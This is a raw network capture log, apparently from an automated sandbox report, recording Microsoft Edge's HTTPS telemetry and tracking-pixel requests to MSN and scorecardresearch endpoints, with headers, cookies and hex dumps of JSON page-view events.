                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1
                                                                                                                                                                  2025-01-06 22:18:06 UTC3857OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 31 38 3a 30 34 2e 37 36 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 63 33 36 31 32 61 2d 36 39 63 62 2d 34 39 63 61 2d 39 35 64 30 2d 33 32 63 36 34 34 66 62 30 36 62 30 22 2c 22 65 70 6f 63 68 22 3a 22 33 39 33 35 32 35 39 31 30 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-06T22:18:04.769Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"3ec3612a-69cb-49ca-95d0-32c644fb06b0","epoch":"3935259103"},"app":{"locale
                                                                                                                                                                  2025-01-06 22:18:06 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=34a4f7b247bc4e76bf482aae86caecf4&HASH=34a4&LV=202501&V=4&LU=1736201886480; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:18:06 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=c6db634c1a6c4b50b7bce0de0c0cf3d2; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:48:06 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1707
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:06 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  9192.168.2.45000818.173.219.1134435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:06 UTC1012OUTGET /b2?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: UID=1E1e49df192553de02181e61736201885; XID=1E1e49df192553de02181e61736201885
                                                                                                                                                                  2025-01-06 22:18:06 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:06 GMT
                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                  Via: 1.1 7bd20765fb335de036eff4682be365d4.cloudfront.net (CloudFront)
                                                                                                                                                                  X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                  X-Amz-Cf-Id: R54OSoe1GI5kmHE0kJ3YDtOa_9p1oFCnMErCy5BwmOCyRhGGQ3bHJg==


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  10192.168.2.45001620.110.205.1194435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:06 UTC1261OUTGET /c.gif?rnd=1736201884774&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=21dedbcc40f24d988b676b18e5a4d184&activityId=21dedbcc40f24d988b676b18e5a4d184&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=09177A4F17534286BB4134B207DC161D&MUID=1B715D3435BD60832FC8485834156189 HTTP/1.1
                                                                                                                                                                  Host: c.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; SM=T
                                                                                                                                                                  2025-01-06 22:18:07 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                  Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  ETag: "9270eb7934bdb1:0"
                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                  P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                  Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                  Set-Cookie: MUID=1B715D3435BD60832FC8485834156189; domain=.msn.com; expires=Sat, 31-Jan-2026 22:18:06 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                  Set-Cookie: SRM_M=1B715D3435BD60832FC8485834156189; domain=c.msn.com; expires=Sat, 31-Jan-2026 22:18:06 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                  Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 13-Jan-2025 22:18:06 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                  Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 06-Jan-2025 22:28:06 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:06 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 42
                                                                                                                                                                  2025-01-06 22:18:07 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  11192.168.2.45004420.42.65.854435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:09 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201887861&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 11511
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                  2025-01-06 22:18:09 UTC11511OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 31 38 3a 30 37 2e 38 36 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 63 33 36 31 32 61 2d 36 39 63 62 2d 34 39 63 61 2d 39 35 64 30 2d 33 32 63 36 34 34 66 62 30 36 62 30 22 2c 22 65 70 6f 63 68 22 3a 22 33 39 33 35 32 35 39 31 30 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:18:07.860Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"3ec3612a-69cb-49ca-95d0-32c644fb06b0","epoch":"3935259103"},"app":{"locale
                                                                                                                                                                  2025-01-06 22:18:09 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=47a89d7f00534ea4b6e55ceb003da205&HASH=47a8&LV=202501&V=4&LU=1736201889348; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:18:09 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=4d28e74a303547e9a8ea6ca635d5f6a5; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:48:09 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1487
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:08 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  12192.168.2.45004520.42.65.854435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:09 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201887865&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 5103
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                  2025-01-06 22:18:09 UTC5103OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 31 38 3a 30 37 2e 38 36 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 63 33 36 31 32 61 2d 36 39 63 62 2d 34 39 63 61 2d 39 35 64 30 2d 33 32 63 36 34 34 66 62 30 36 62 30 22 2c 22 65 70 6f 63 68 22 3a 22 33 39 33 35 32 35 39 31 30 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:18:07.864Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"3ec3612a-69cb-49ca-95d0-32c644fb06b0","epoch":"3935259103"},"app":{"locale
                                                                                                                                                                  2025-01-06 22:18:12 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=c4555bd250ff4e40842a658d8d354584&HASH=c455&LV=202501&V=4&LU=1736201892684; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:18:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=b2bc21c53497470c8844bdf912b73269; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:48:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 4819
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:12 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  13192.168.2.45004920.42.65.854435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:09 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201888101&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 5380
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; msnup=
                                                                                                                                                                  2025-01-06 22:18:09 UTC5380OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 31 38 3a 30 38 2e 31 30 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 63 33 36 31 32 61 2d 36 39 63 62 2d 34 39 63 61 2d 39 35 64 30 2d 33 32 63 36 34 34 66 62 30 36 62 30 22 2c 22 65 70 6f 63 68 22 3a 22 33 39 33 35 32 35 39 31 30 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:18:08.100Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"3ec3612a-69cb-49ca-95d0-32c644fb06b0","epoch":"3935259103"},"app":{"locale
                                                                                                                                                                  2025-01-06 22:18:09 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=fe73712c2e6a4dbfb2dad522d9b06abb&HASH=fe73&LV=202501&V=4&LU=1736201889582; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:18:09 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=953ca2e0252a4788bd033bcf7c08f7e4; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:48:09 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1481
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:08 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  14192.168.2.45005420.42.65.854435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:10 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201888863&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 9879
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; msnup=
                                                                                                                                                                  2025-01-06 22:18:10 UTC9879OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 31 38 3a 30 38 2e 38 36 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 63 33 36 31 32 61 2d 36 39 63 62 2d 34 39 63 61 2d 39 35 64 30 2d 33 32 63 36 34 34 66 62 30 36 62 30 22 2c 22 65 70 6f 63 68 22 3a 22 33 39 33 35 32 35 39 31 30 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-06T22:18:08.862Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"3ec3612a-69cb-49ca-95d0-32c644fb06b0","epoch":"3935259103"},"app":{"loc
                                                                                                                                                                  2025-01-06 22:18:10 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=bc7eaab5215340cc93e5c633d0d1371f&HASH=bc7e&LV=202501&V=4&LU=1736201890421; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:18:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=0ac5aa0a887f49c19fb5e2a5ae05b720; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:48:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1558
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:10 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
